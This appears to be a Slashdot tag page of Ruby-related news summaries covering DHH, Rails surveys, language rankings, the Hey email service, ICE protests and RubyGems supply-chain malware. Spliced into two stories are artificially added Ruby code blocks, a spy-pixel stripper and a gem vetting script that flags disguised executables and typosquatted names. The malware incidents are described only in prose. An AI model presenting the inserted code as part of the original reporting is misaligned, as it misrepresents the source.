Software

Computers Are Hard: Building Software With David Heinemeier Hansson (medium.com) 54

Wojtek Borowicz interviews David Heinemeier Hansson, the creator of the popular Ruby on Rails web development framework:

Wojtek Borowicz: Software methodology is an industry of its own. There is Scrum, and Agile, and coaches, and books, and all of that. But you and your team at Basecamp don't follow these practices. Why?

DHH: First of all, our approach to software development is heavily inspired by the Agile Manifesto and the Agile values. It is not so much inspired by the Agile practices as they exist today. A lot of Agile software methodologies focus on areas of product development that are not where the hard bits lie. They are so much about the procedural structures. Software, in most cases, is inherently unpredictable, unknowable, and unshaped. It's almost like a gas. It can fit into all sorts of different openings from the same basic idea. The notion of trying to estimate how long a feature is going to take doesn't work because you don't know what you're building and because humans are terrible at estimating anything. The history of software development is one of late or cancelled projects. If you were to summarize the entire endeavor of software development, you'd say: 'The project ran late and it got canceled.' Planning work doesn't work, so to speak.

What we do at Basecamp we chose to label Shape Up, simply because that is where we find the hard work to be. We're trying to just accept the core constraint that it is impossible to accurately specify what software should do up front. You can only discover what software should do within constraints. But it's not like we follow the idea that it's done when it's done, either. That's an absolute abdication of product management thinking. What we say instead is: don't do estimates, do budgets. The core of Shape Up is about budgets. Not how long is something going to take but what is something worth. Because something could take a week or four months. What is it worth? [...]

Wojtek Borowicz: So the problem with those methodologies is they put too much focus on estimating, which is inherently impossible with software?

DHH: I'd go even further and say that estimation is bullshit. It's so imprecise as to be useless, even when you're dealing with fixed inputs. And you're not. No one is ever able to accurately describe what a piece of software should do before they see the piece of software. This idea that we can preemptively describe what something should do before we start working on it is bunk. Agile was sort of onto this idea that you need running software to get feedback but the modern implementations of Agile are not embracing the lesson they themselves taught.

Programming

Survey Finds Only 3% of Ruby on Rails Developers Use Windows (rails-hosting.com) 71

This week saw the release of the 2020 Ruby on Rails Community Survey Results: 2,049 members of the Rails community from 92 countries kindly contributed their thoughts on tools, frameworks, and workflows in their day to day development lives. From these responses we hope to get an understanding of where Rails stands as a framework in 2020.

Some of these questions have been asked since our original survey over a decade ago, and show how the community has evolved over the last twelve years.
Inside.com's developer newsletter summarized some of the results:

- The typical Rails developer is self-taught, has been working with Rails 4-7 years, and works remotely...

- Rails developers overwhelmingly choose lightweight solutions like jQuery over larger frameworks.

- Most of the developers surveyed feel Rails is still relevant, although they were split on whether or not the Rails core team is moving in the right direction, with 48% totally agreeing with that sentiment.

According to the results, 24% of survey respondents primarily developed on Linux, while 73% used Mac OS X (leaving just 3% using Windows or "Other"). Yet the most popular editor was Microsoft's Visual Studio Code (used by 32% of respondents), followed by Vim-based editors (21%), Sublime (16%), RubyMine (15%), Atom (9%), Emacs (3%), and TextMate (2%).

The survey also asked the size of development teams for "your primary Rails application."
  • A team of one - 17%
  • Two to four - 35%
  • Five to eight - 19%
  • Eight to 15 - 13%
  • 16 to 25 - 6%
  • 25-50 - 5%
  • 50-plus - 5%

Meanwhile, in a recent talk, Ruby creator Yukihiro Matsumoto confirmed that Ruby 3 will finally be released this Christmas, December 25, bringing a new pattern-matching syntax, right-hand-side variable assignment, and numbered block parameters.

He also promised improvements to help make Ruby more fast, more concurrent, and more correct. (Though "We don't pursue completeness nor soundness of the type systems, because, you know, Ruby is Ruby. Ruby is basically dynamically typed...")


Microsoft

Microsoft Launches New Web Site Describing How It's Embracing Open Source (zdnet.com) 99

Microsoft just launched a new website "to showcase how it's embracing open source to 'bring choice, technology and community to our customers,'" reports ZDNet: Microsoft, under CEO Satya Nadella, has said and done a lot to shed its image as a pariah of Linux and open-source software communities. With a Linux kernel for Windows 10, GitHub, a new Android Surface Duo, and the commercial cloud as its main source of revenue, Microsoft is a very different company than it was 30 years ago when it was afraid open-source software would gobble up its intellectual property and revenues.

Nowadays, it's got a growing number of open-source projects, including its hugely popular cross-platform code editor Visual Studio Code (VS Code), .NET Core, the hit JavaScript-based programming language TypeScript, and new open-source Windows developer tools like PowerToys and Windows Terminal... According to the company, over 35,000 engineers at the company are using GitHub Enterprise Cloud to host and release official Microsoft open-source projects, samples, and documentation...

Jeff Wilcox, a software engineer with the Microsoft Open Source Programs Office, announced the new site Thursday. He notes that it is "built by the Ruby open-source project Jekyll (that also powers GitHub Pages)".

Programming

TIOBE's Surprisingly Popular Programming Languages: R, Go, Perl, Scratch, Rust, and Visual Basic 6 (techrepublic.com) 101

The R programming language is experiencing a surge in popularity "in the slipstream of Python," according to this month's TIOBE index, leaping into the top ten.

"For historical context, we wrote of R's spot in TIOBE nearly two years ago, and it had just made the leap from #50 to #39," writes programming columnist Mike Melanson.

ZDNet writes: In May, when R crashed out of the top 20 for the first time in three years, Tiobe speculated that the language could be a victim of consolidation in statistical programming, with more developers in the field gravitating towards Python.
But there's been a lot of motion since then, Tech Republic reports: R rose one space to eighth place in July, but its comparison to 2019 is where the real surprise lies: It was in 20th place at the same time last year. TIOBE CEO Paul Jansen cites two reasons why R may be increasing in popularity:

- Universities and research institutes have moved away from commercial statistical languages like SAS and Stata in favor of open source languages Python and R.

- The increase in analytics being used to search for a COVID-19 vaccine...

The largest gainers in popularity between July 2019 and July 2020 are Go, which jumped from 16th to 12th place, Perl, jumping from No. 19 to No. 14, Scratch, jumping from No. 30 to No. 17, Rust, which moved from No. 33 to No. 18, and PL/SQL, which moved from No. 23 to No. 19.

Ruby fell the most, moving from 11th place to 16th, while SQL, MATLAB, and Assembly Language also slipped down the list.

ZDNet adds that "Besides R's upwards shift, Tiobe's July index doesn't show much movement in the popularity of the top languages. The top 10 in descending order are C, Java, Python, C++, C#, Visual Basic, JavaScript, R, PHP and Swift."

Visual Studio Magazine argues that the biggest surprise may be that the 29-year-old classic Visual Basic is still in the top 20 — since its last stable release was 22 years ago, and by 2008 it was finally retired by Microsoft. "VB6 just refuses to go away, achieving cult-like status among a group of hard-core supporters."
Businesses

Is Twitter Shifting the Balance of Power From Companies to Their Employees? (theverge.com) 64

Last week leaked audio surfaced of investors arguing that journalists have too much power.

But the Verge's Silicon Valley editor asks, "What if you take the whole discussion of "tech versus journalism" and reframe it as 'managers versus employees'? Then, I think, you get closer to the truth of what's going on." After all, this conflict started with employees. They were the people who initially described their working conditions under Steph Korey at Away, leading her to step aside as CEO. (She later returned, only for the company to say she would step aside later this year after her comments about the media on Instagram.) The employees made their comments at a time of increasing activism inside workplaces. Since the Google walkout in 2018, employees of venture-backed startups and public companies have become increasingly comfortable in speaking out — often using social media platforms to call out their employers. This trend has only accelerated since the Black Lives Matters protests swept the nation last month — which, among other things, led to the first-ever virtual Facebook walkout a few weeks later.

Workers still face significant obstacles as they lobby to create more fair and equitable workplaces. But Twitter in particular has given them a place where not only can they be heard, but — crucially — employers can't really fight back... [T]weets have given workers an asymmetric advantage in the unrest — a one-sided argument is easy to win — and we're seeing it play out in new ways all the time. This dynamic, which is tilted heavily against bosses, goes a long way in explaining the disdain that the managerial class has for what they call "hit pieces." A "hit piece," in angry Twitter parlance, is typically a piece of journalism in which one or more employees are granted anonymity to talk about their working conditions. Journalists, myself included, would simply call that reporting. But it's the kind of reporting that tilts the balance away from managers and toward their employees — and in ways that are difficult to fight back against...

And so it shouldn't be surprising, when a prominent reporter like Taylor Lorenz calls attention to posts like Korey's, the managerial class rises to Korey's defense. When CEOs can be held accountable not just for their working conditions but for social media defenses of their work, that represents a threat to the entire managerial tribe. And that explains how venture capitalists, who have millions of dollars at their disposal and could comfortably retire without ever participating in a single Twitter fight, have nonetheless come to see themselves as the underdogs in this situation. They got where they are in part because they've been good at winning arguments, and now they find themselves living in a world where they get punished for arguing...

[T]he next time you see journalists and tech overlords going a few rounds online, ask yourself whether what you're looking at isn't, on some level, a labor issue...

Workers are justifiably outraged about the state of affairs in this country, and some of that outrage is being captured by journalists.

David Heinemeier Hansson, creator of Ruby on Rails and the founder of Basecamp, called the piece "a wonderful framing of the issue" in a series of tweets. "While I decry this website as the bane of modern living half the time, the other half it has probably done more to move my own position on many issues than anything else online.

"Which is why I'm not actually sure that VC Twitter should be so eager to cheer on 'citizen journalism'. The number of citizens that count themselves in the worker class vs. manager class are far more plentiful. And their unfiltered stories really do add up to paint the picture."
Businesses

Venture Capitalists' Critiques of Journalism Secretly Leaked to Journalists (vice.com) 118

A confrontation between venture capitalists and journalists has been slowly playing out on Twitter — and in an incendiary article on VICE US.

It started when...
  • A luggage startup's co-CEO complained on Instagram about young reporters who "forgo their personal ethics."
  • A New York Times reporter called the posts "incoherent" and "disappointing."
  • Angel investor Balaji S. Srinivasan (also the former CTO of Coinbase) later said the reporter "attacked" the co-CEO, whom he then needed to defend — calling the reporter a sociopath in a multi-tweet thread.
  • The New York Times reporter tweeted that investor had "been ranting about me by name for months now."

The reporter and the angel investor both finally ended up on Clubhouse, an elite invitation-only audio social network popular with venture capitalists, but the reporter left early. Later Vice published leaked audio of the subsequent conversation, which included Srinivasan and several other Andreessen Horowitz venture capitalists, in which Vice says participants "spent at least an hour talking about how journalists have too much power to 'cancel' people and wondering what they, the titans of Silicon Valley, could do about it."

Then things got really ugly...


Programming

David Heinemeier Hansson Explains What It Takes to Write Great Code (evrone.com) 66

The "bespoke development" site Evrone.com (an IT outsourcing company) interviewed Ruby on Rails creator David Heinemeier Hansson (who is also co-founder and CTO of Basecamp -- and a racecar driver) shortly before he spoke at RubyRussia, Evrone's annual Moscow programming conference.

And they asked him an interesting question. As a man who's seen lots of Ruby code, "what makes code good or shitty? Anything that is obvious for you at first glance?" David Heinemeier Hansson: If the code is poorly written, usually it smells before you even examine the logic. Indentation is off, styles are mixed, care is simply not shown. Beyond that, learning how to write great code, is a life long pursuit. As I said in my RailsConf 2014 keynote, we're not software engineers, we're software writers. "Writing" is a much more suitable metaphor for what we do most of the time than "engineering" is. Writing is about clarity and presenting information in a clear-to-follow manner so that anybody can understand it.

There's no list of principles and practices that somebody can be taught and then they will automatically produce clear writing every time. If you want to be a good writer, it's not enough just to memorize the dictionary. Just knowing the words available to you, knowing the patterns of development is not going to make you a good developer. You have to develop an eye. You have to decide that the most important thing for your system is clarity. When you do decide that, you can start developing an eye.

The only way to become a good programmer, where, by definition, I define good programmers as somebody who writes software with clarity, is to read a lot of software and write a lot of software.

In 2016, David Heinemeier Hansson answered questions from Slashdot readers.
Privacy

Meet the Big Tech Critic Behind Hey, Basecamp's Radical New Email Platform (fastcompany.com) 42

The Basecamp cofounder and creator of the web application framework Ruby on Rails, David Heinemeier Hansson, has become increasingly outspoken about Big Tech's privacy violations and monopolistic tendencies. Now he's inviting you to join the cause -- by switching your email provider. From a report: Two years ago, he and fellow Basecamp cofounder and CEO Jason Fried decided to do something about it. The culmination of that work is a paid, $99-per-year email service called Hey, which launches today. Along with protecting users from the types of invasive surveillance tactics that have become de rigueur online, Hey also contains some radical ideas about the way that modern correspondence should work. Silicon Valley will be watching the product closely: Consumers like to say they value their privacy, but are they finally willing to pay for it?

[...] Most people haven't tried a new email service since Gmail launched 16 years ago, if not earlier. A handful of startups have played around with email interfaces in the years since, trying to make the experience cleaner and mobile-friendly, but no one has touched concepts as foundational as the inbox itself. Hansson and Fried argue that now is the time to do just that. They have made several radical changes to the inbox, the most glaring of which is that you, the email recipient, have control over who is allowed to appear there. That means you screen all first-time senders. They've also separated out what they call the "The Feed" and the "Paper Trail," so that there are distinct places for emails like newsletters and shipping confirmation notices. Because The Feed requires opt-in confirmation, it's much more pleasant to browse than Gmail's cluttered Promotions tab. It's also more private: Hey strips incoming messages of the tracking tools known as spy pixels that have become common practice in many emails. (The service indicates any emails that originally had tracking capabilities by displaying a small binoculars icon next to them.)
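To make the spy-pixel behaviour described above concrete, here is an added example (not Hey's code) of a heuristic filter over an HTML email body: it removes `<img>` tags that look like tracking beacons and reports what it removed, so a client could flag the message the way the article describes. The size/visibility thresholds, the tracker host list and the regex-based tag handling are assumptions for illustration; a production client would use a real HTML parser.

```ruby
require "uri"

# Added example, not Hey's implementation. Matches a whole <img ...> tag;
# attribute values in email HTML do not normally contain '>'.
IMG_TAG = /<img\b[^>]*>/i

# Known beacon hosts are a constructed list for this example (assumption).
TRACKER_HOSTS = %w[track.example.net beacon.example.org].freeze

# Pull one attribute value out of a tag, accepting "", '' or bare values.
def attr(tag, name)
  m = tag.match(/\b#{Regexp.escape(name)}\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i)
  m && (m[1] || m[2] || m[3])
end

# A 0 or 1 pixel dimension (with or without a px suffix) is beacon-sized.
def tiny_dimension?(value)
  return false if value.nil?
  n = value.to_s.strip.sub(/px\z/i, "")
  n.match?(/\A\d+\z/) && n.to_i <= 1
end

# Heuristics for a tracking pixel: the image is fetched from a remote host
# AND (it is 1x1 or smaller, OR hidden via CSS, OR served by a known tracker).
# Inline cid: images are never flagged because fetching them leaks nothing.
def tracking_pixel?(tag)
  src = attr(tag, "src")
  return false unless src && src.match?(%r{\Ahttps?://}i)
  tiny   = tiny_dimension?(attr(tag, "width")) || tiny_dimension?(attr(tag, "height"))
  style  = attr(tag, "style").to_s
  hidden = style.match?(/display\s*:\s*none|visibility\s*:\s*hidden/i)
  host   = (URI.parse(src).host rescue nil)
  known  = TRACKER_HOSTS.include?(host)
  tiny || hidden || known
end

# Returns the cleaned HTML plus the list of beacon URLs that were removed,
# so the caller can show an indicator (the article's binoculars icon) when
# the list is non-empty.
def strip_spy_pixels(html)
  found = []
  cleaned = html.gsub(IMG_TAG) do |tag|
    if tracking_pixel?(tag)
      found << attr(tag, "src")
      ""
    else
      tag
    end
  end
  { html: cleaned, trackers: found }
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample message: one real logo, one 1x1 beacon, one hidden beacon.
  sample = <<~HTML
    <p>Your order has shipped.</p>
    <img src="https://cdn.example.com/logo.png" width="200" height="50" alt="logo">
    <img src="https://track.example.net/o/abc123" width="1" height="1" alt="">
    <img src="https://img.example.com/p.gif" style="display:none">
  HTML
  result = strip_spy_pixels(sample)
  puts "trackers removed: #{result[:trackers].size}"
  puts result[:html]
end
```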

Programming

Developers Reveal Programming Languages They Love and Loathe, and What Pays Best (zdnet.com) 139

Stack Overflow has released the results of its 2020 survey of nearly 65,000 developers, revealing their favorite and most dreaded programming languages, tools and frameworks. From a news writeup: The survey shows that TypeScript, Microsoft's superset of the widely-used JavaScript programming language, has overtaken Python as the second most beloved programming language behind Rust. This year 86% of respondents say they are keen to use Rust, while 67.1% want to use TypeScript, and 66.7% want to use Python. Stack Overflow attributes TypeScript's rising popularity to Microsoft's embrace of open source software as well as the existence of larger and more complex JavaScript and Node.js codebases.

Rust has been the most loved programming language for five years running, despite few developers having experience with it. This year, just 5.1% developers report having used Rust, compared with the 68% who use JavaScript, which is the most commonly used language. [...] Meanwhile, the top 10 most dreaded programming languages are VBA, Objective-C, Perl, Assembly, C, PHP, Ruby, C++, Java and R.

The report also looks at average salaries of each developer role. In the US, engineering managers attract the highest salary at $152,000 per year, followed by site reliability engineers who earn $140,000 per year. Salaries across the globe for these roles are lower, at $92,000 for an engineering manager and $80,000 for a site reliability engineer. Other high-paying roles with an average salary of at least $115,000 in the US include data scientist and machine learning specialist, DevOps specialist, engineer, back-end developer, embedded application developers, mobile developers, scientist, desktop application developer, and educator.

Ruby

Clipboard Hijacking Malware Found in 725 Ruby Libraries (zdnet.com) 22

Security researchers from ReversingLabs say they've discovered 725 Ruby libraries uploaded on the official RubyGems repository that contained malware meant to hijack users' clipboards. From a report: The malicious packages were uploaded on RubyGems between February 16 and 25 by two accounts -- JimCarrey and PeterGibbons. The 725 libraries, which are listed here in full, were removed two days later, on February 27, after the ReversingLabs team notified the RubyGems security team. All the Ruby libraries were copies of legitimate libraries, used lookalike names, worked as intended, but also contained additional malicious files. The extra file inserted into each package was named aaa.png. However, ReversingLabs say this file wasn't a PNG image, but instead was a Windows PE executable.
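The two traits the report describes, a lookalike gem name and an "image" whose bytes are really a Windows PE executable, are both cheap to check before installing. The following is an added example (not ReversingLabs' or RubyGems' code) of such a pre-install vetting pass: gem contents are modelled as a hash of path to raw bytes, and the list of popular gem names to compare against is a constructed assumption.

```ruby
# Added example, not part of the report or of RubyGems. Flags files whose
# leading bytes contradict their extension, and gem names within a small edit
# distance of a known gem.

PNG_MAGIC = "\x89PNG\r\n\x1a\n".b   # 8-byte PNG signature
PE_MAGIC  = "MZ".b                  # DOS/PE header found at offset 0 of Windows executables

# Identify a file's real type from its leading bytes, ignoring its extension.
def sniff_type(bytes)
  data = bytes.b
  return :png if data.start_with?(PNG_MAGIC)
  return :pe  if data.start_with?(PE_MAGIC)
  :unknown
end

# The type a file claims to be, judging only by its extension.
def claimed_type(path)
  case File.extname(path).downcase
  when ".png"         then :png
  when ".exe", ".dll" then :pe
  else :unknown
  end
end

# Paths whose sniffed type contradicts their extension (e.g. a PE under .png).
# Files with an unrecognised signature are skipped rather than flagged.
def mismatched_files(files)
  files.each_with_object([]) do |(path, bytes), out|
    actual = sniff_type(bytes)
    next if actual == :unknown
    out << path if actual != claimed_type(path)
  end
end

# Levenshtein distance between two strings (insert/delete/substitute = 1).
def edit_distance(a, b)
  prev = (0..b.length).to_a
  a.each_char.with_index(1) do |ca, i|
    cur = [i]
    b.each_char.with_index(1) do |cb, j|
      cur << [prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca == cb ? 0 : 1)].min
    end
    prev = cur
  end
  prev.last
end

# Known gem names that `name` is suspiciously close to (but not identical to).
# The `known` list is supplied by the caller; here it is a constructed sample.
def lookalike_of(name, known, max_distance: 2)
  known.reject { |k| k == name }
       .select { |k| edit_distance(name, k) <= max_distance }
end

# Combine both checks; either non-empty result is a reason not to install.
def vet_gem(name, files, known)
  { lookalikes: lookalike_of(name, known), disguised: mismatched_files(files) }
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample: a gem named one transposition away from "atlas-client",
  # shipping a file called aaa.png whose bytes begin with a PE header.
  known_gems = %w[atlas-client nokogiri rails]
  files = {
    "lib/atlas_client.rb" => "module AtlasClient; end\n",
    "ext/aaa.png"         => "MZ\x90\x00\x03\x00\x00\x00".b,  # constructed PE header bytes
    "logo.png"            => PNG_MAGIC + "\x00".b,             # genuine PNG signature
  }
  puts vet_gem("atlas-cilent", files, known_gems).inspect
end
```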
Programming

Study Finds High Demand for Go and AR/VR Programmers, While Python Remains Favorite Language (hired.com) 75

The tech jobs marketplace at Hired.com crunched their data on more than 400,000 interview requests and job offers over the last year to produce their annual "State of Software Engineers" report. Among its surprising insights: software engineers with more than 10 years of experience get 20% fewer interview requests than engineers with 4 to 10 years of experience.

Other insights: Demand for AR/VR talent is up by 1400%, mirroring blockchain's 517% demand growth last year... In large U.S. tech hubs AR/VR engineer salaries range from $135k - $150k... 46% of software engineers rank AR/VR as one of the top 3 technologies they'd like to learn in 2020... If you work in AR/VR, you may want to move to San Francisco, where they pay $150k/year on average.
The next-highest growth in demand came for "gaming engineers" and "computer vision engineers" -- with both positions seeing a 146% increase in demand over 2018. The next-highest demand growth was for "search engineers" (increasing 137%) and for "machine learning engineers" (increasing 89%). Demand for "blockchain engineers" increased by just 9%.

But they also report that demand for frontend and backend engineers "grew steadily by 17%, which shows that all companies -- not just Silicon Valley tech giants -- are evolving into being tech companies..." The worldwide process of digital transformation, while something of a buzzword, reflects a critical truth: every company is now a technology company. Whether the company is Bank of America, Alaska Airlines, Sainsbury's, or Tesla, investment in top software engineering talent isn't a future ambition, it's a matter of survival.
And the #1 most-desired coding skill was Go (for the second year in a row), "garnering an average of 9.2 interview requests for every Go-skilled candidate..." But there may be a larger trend. All told, the number of interview requests across all languages remained nearly constant year-over-year, with only minor fluctuations in average requests, and zero change in how each language ranked against others. This could suggest that supply for these skills has not yet caught up with demand...

According to Robert Half, 67% of IT managers plan to expand their teams in areas such as security, cloud computing and business intelligence, but 89% reported challenges in recruiting that talent. Those challenges in hiring are even greater for roles related to machine learning, artificial intelligence, and blockchain.

Their analysis concludes the most in-demand programming languages are Go, Scala, Ruby, TypeScript, Kotlin, Objective C, JavaScript, Swift, PHP, Java, HTML, and then Python -- though Python, JavaScript, and Java are engineers' favorite coding languages, "largely because of their useful and well-maintained libraries and packages..."

"Ruby, PHP and Objective C are ranked the least favorite (and least fun) languages for software engineers."
Education

Free Coding Bootcamp 'Lambda' Tries Selling Its Income-Sharing Agreements -- In Bundles (theverge.com) 34

An anonymous reader quotes the Verge: In December, online coding bootcamp Lambda School quietly partnered with Edly, a digital marketplace that helps schools sell income-sharing agreements (ISAs) to accredited investors. The arrangement allows Lambda to receive money from the ISAs upfront, rather than waiting for students to find jobs. But it also flies in the face of the values Lambda typically espouses: namely, that ISAs align its incentives with the goals and aspirations of the students...

Lambda's ISAs promise an alternative to traditional student loans by allowing students to defer tuition until they've landed a job that pays $50,000 a year or more. When that happens, they hand over 17 percent of their income until the $30,000 tuition is paid off. If students don't find work within five years of completing the program, the ISA is automatically dissolved. It's a business model that allows Lambda to brag about investing in students — which, in many ways, it still does. The school provides living stipends and even housing to some students who need it. But reselling ISAs muddies the narrative a bit since Lambda can make money long before students find jobs...

Shortly after the arrangement was called out on Twitter, following a report by The Verge about some students' disappointment with the curriculum, Edly began taking down pages that referenced the Lambda partnership. Edly did not immediately respond to a request for comment about why these pages were taken down, and Lambda declined to comment on the nature of the partnership at all.

"I wonder why Lambda isn't so keen on seeing discussions about how students are being packed into the same kind of CDOs that brought us the financial crisis," tweeted David Heinemeier Hansson, the creator of Ruby on Rails, who's been tweeting screenshots of Edly's past statements about their ambitions as well as links to Google's cache of Edly's pitches to investors.

Last year Wired reported that nearly half of Lambda's ISAs had at least partly been sold off to investors. They also note that in January of 2019, Lambda "received $30 million from investors including Google Ventures, Y Combinator, and Ashton Kutcher."
IT

Makers of Basecamp Announce Email Product 'Hey', Open Invites (hey.com) 45

Makers of productivity suite Basecamp have announced Hey, an email product they plan to release this spring. Basecamp founder and CEO Jason Fried shared the vision for what they are calling a much-improved approach to email in an open letter today on the Hey website: You started getting stuff you didn't want from people you didn't know. You lost control over who could reach you. You were forced to inherit other people's bad communication habits. Then an avalanche of automated emails amplified the clutter. And Gmail, Outlook, Yahoo, Apple, and all the others just let it happen. Now email feels like a chore, rather than a joy. Something you fall behind on. Something you clear out, not cherish. Rather than delight in it, you deal with it. Your relationship with email changed, and you didn't have a say.

So good news, the magic's still there. It's just obscured -- buried under a mess of modern day bad habits and neglect. Some from people, some from machines, a lot from email systems. It deserves a dust off. A renovation. Modernized for the way we email today. With HEY, we've done just that. It's a redo, a rethink, a simplified, potent reintroduction of email. A fresh start, the way it should be. For web, iOS, and Android. HEY is our love letter to email, and we're sending it to you.
Over 12,000 people have requested early access to Hey since yesterday, said David Heinemeier Hansson, founder of Basecamp, and creator of Ruby on Rails.
Stats

2019's Fastest Growing Programming Language Was C, Says TIOBE (tiobe.com) 106

Which programming language saw the biggest jump on TIOBE's index of language popularity over the last year?

Unlike last year -- it's not Python. An anonymous reader quotes TIOBE.com: It is good old language C that wins the award this time with a yearly increase of 2.4%... The major drivers behind this trend are the Internet of Things (IoT) and the vast amount of small intelligent devices that are released nowadays...

Runners up are C# (+2.1%), Python (+1.4%) and Swift (+0.6%)...

Other interesting winners of 2019 are Swift (from #15 to #9) and Ruby (from #18 to #11). Swift is a permanent top 10 player now and Ruby seems [destined] to become one soon.

Some languages that were supposed to break through in 2019 didn't: Rust won only 3 positions (from #33 to #30), Kotlin lost 3 positions (from #31 to #35), Julia lost even 10 positions (from #37 to #47) and TypeScript won just one position (from #49 to #48).

And here's the new top 10 programming languages right now, according to TIOBE's January 2020 index.
  • Java
  • C
  • Python
  • C++
  • C# (up two positions from January 2019)
  • Visual Basic .NET (down one position from January 2019)
  • JavaScript (down one position from January 2019)
  • PHP
  • Swift (up six positions from January 2019)
  • SQL (down one position from January 2019)

Businesses

GitHub Faces More Resignations In Light of ICE Contract (techcrunch.com) 226

TechCrunch reports that another employee, engineer Alice Goldfuss, has resigned from GitHub over the company's $200,000 contract with Immigration and Customs Enforcement (ICE). From the report: In a tweet, Goldfuss said GitHub has a number of problems to address and that "ICE is only the latest." Meanwhile, Vice reports at least five staffers quit today. These resignations come the same day as GitHub Universe, the company's big product conference. Ahead of the conference, Tech Workers Coalition protested the event, setting up a cage to represent where ICE detains children.

Last month, GitHub staff engineer Sophie Haskins resigned, stating she was leaving because the company did not cancel its contract with ICE, The Los Angeles Times reported. Last month, GitHub employees penned an open letter urging the company to stop working with ICE. That came following GitHub's announcement of a $500,000 donation to nonprofit organizations in support of "immigrant communities targeted by the current administration." In that announcement, GitHub CEO Nat Friedman said ICE's purchase was made through one of GitHub's reseller partners and said the deal is not "financially material" for the company. Friedman also pointed out that ICE is responsible for more than immigration and detention facilities.

AI

Viral Tweets From Steve Wozniak and Ruby on Rails Creator Spur Investigation Into Apple Credit Card (bbc.com) 159

An anonymous reader quotes the BBC: A US financial regulator has opened an investigation into claims Apple's credit card offered different credit limits for men and women. It follows complaints -- including from Apple's co-founder Steve Wozniak -- that algorithms used to set limits might be inherently biased against women.

New York's Department of Financial Services has contacted Goldman Sachs, which runs the Apple Card. Any discrimination, intentional or not, "violates New York law", the Department of Financial Services said. The Bloomberg news agency reported on Saturday that tech entrepreneur David Heinemeier Hansson had complained that the Apple Card gave him 20 times the credit limit that his wife got. In a tweet, Mr Hansson said the disparity was despite his wife having a better credit score. Later, Mr Wozniak, who founded Apple with Steve Jobs, tweeted that the same thing happened to him and his wife despite their having no separate bank accounts or separate assets. Banks and other lenders are increasingly using machine-learning technology to cut costs and boost loan applications. But Mr Hansson, creator of the programming tool Ruby on Rails, said it highlights how algorithms, not just people, can discriminate.

"Apple and Goldman Sachs have both accepted that they have no control over the product they sell," Hansson posted angrily on Twitter. "THE ALGORITHM is in charge now!

"All humans can do is apologize on its behalf, and pray that it has mercy on the next potential victims."
Ruby

Developer Takes Down Ruby Library After He Finds Out ICE Was Using It (zdnet.com) 463

An anonymous reader quotes a report from ZDNet: A software engineer pulled a personal project down after he found out that one of the companies using it had recently signed a contract with U.S. Immigration and Customs Enforcement (ICE). The engineer, Seth Vargo, cited ICE's "inhumane treatment, denial of basic human rights, and detaining children in cages," as the reason for taking down his library. The project was called Chef Sugar, a Ruby library for simplifying work with Chef, a platform for configuration management. Vargo developed and open-sourced the library while he worked at Chef, and the library was later integrated into Chef's source code.

Earlier this week, a Twitter user discovered that Chef was selling $95,000 worth of licenses through a government contractor to ICE. The news didn't sit well with Vargo, who, yesterday, September 19, took down the Chef Sugar library from both GitHub and RubyGems, the main Ruby package repository, in protest. "I have a moral and ethical obligation to prevent my source from being used for evil," Vargo wrote on the now-empty Chef Sugar GitHub repository. Vargo's actions didn't go unnoticed, and in a blog post published later in the day, Chef Software CEO Barry Crist said the incident impacted "production systems for a number of our customers." The Chef team fixed the issue by recovering older Chef Sugar source code and re-uploading it on their own GitHub account.
Following public criticism of the contract, Crist responded by saying the company had been a long-time ICE collaborator, dating back to the previous administration, long before ICE became the hated agency it is today.

"While I understand that many of you and many of our community members would prefer we had no business relationship with DHS-ICE, I have made a principled decision, with the support of the Chef executive team, to work with the institutions of our government, regardless of whether or not we personally agree with their various policies," Crist said.

"I want to be clear that this decision is not about contract value - it is about maintaining a consistent and fair business approach in these volatile times. I do not believe that it is appropriate, practical, or within our mission to examine specific government projects with the purpose of selecting which U.S. agencies we should or should not do business," Crist added.
Open Source

Why Are 'Supply Chain Attacks' on Open Source Libraries Getting Worse? (arstechnica.com) 44

"A rash of supply chain attacks hitting open source software over the past year shows few signs of abating, following the discovery this week of two separate backdoors slipped into a dozen libraries downloaded by hundreds of thousands of server administrators," reports Ars Technica: The compromises of Webmin and the RubyGems libraries are only the latest supply chain attacks to hit open source software. Most people don't think twice about installing software or updates from the official site of a known developer. As developers continue to make software and websites harder to exploit, black hats over the past few years have increasingly exploited this trust to spread malicious wares by poisoning code at its source...

To be fair, closed-source software also falls prey to supply-side attacks -- as evidenced by those that hit computer maker ASUS on two occasions, the malicious update to tax-accounting software M.E.Doc that seeded the NotPetya outbreak of 2017, and another backdoor that infected users of the CCleaner hard drive utility that same year. But the low-hanging fruit for supply chain attacks seems to be open source projects, in part because many don't make multi-factor authentication and code signing mandatory across their large bases of contributors.

"The recent discoveries make it clear that these issues are becoming more frequent and that the security ecosystem around package publication and management isn't improving fast enough," Atredis Partners Vice President of Research and Development HD Moore told Ars. "The scary part is that each of these instances likely resulted in even more developer accounts being compromised (through captured passwords, authorization tokens, API keys, and SSH keys). The attackers likely have enough credentials at hand to do this again, repeatedly, until all credentials are reset and appropriate MFA and signing is put in place."

Ruby

Backdoor Code Found In 11 Ruby Libraries (zdnet.com) 36

Maintainers of the RubyGems package repository have yanked 18 malicious versions of 11 Ruby libraries that contained a backdoor mechanism and were caught inserting code that launched hidden cryptocurrency mining operations inside other people's Ruby projects. ZDNet reports: The malicious code was first discovered yesterday inside four versions of rest-client, an extremely popular Ruby library. According to an analysis by Jan Dintel, a Dutch Ruby developer, the malicious code found in rest-client would collect and send the URL and environment variables of a compromised system to a remote server in Ukraine. "Depending on your set-up this can include credentials of services that you use e.g. database, payment service provider," Dintel said.

The code also contained a backdoor mechanism that allowed the attacker to send a cookie file back to a compromised project and to execute malicious commands. A subsequent investigation by the RubyGems staff discovered that this mechanism was being abused to insert cryptocurrency mining code. RubyGems staff also uncovered similar code in 10 other projects. All the libraries, except rest-client, were created by taking another fully functional library, adding the malicious code, and then re-uploading it on RubyGems under a new name. All in all, the 18 malicious library versions only managed to amass 3,584 downloads before being removed from RubyGems.
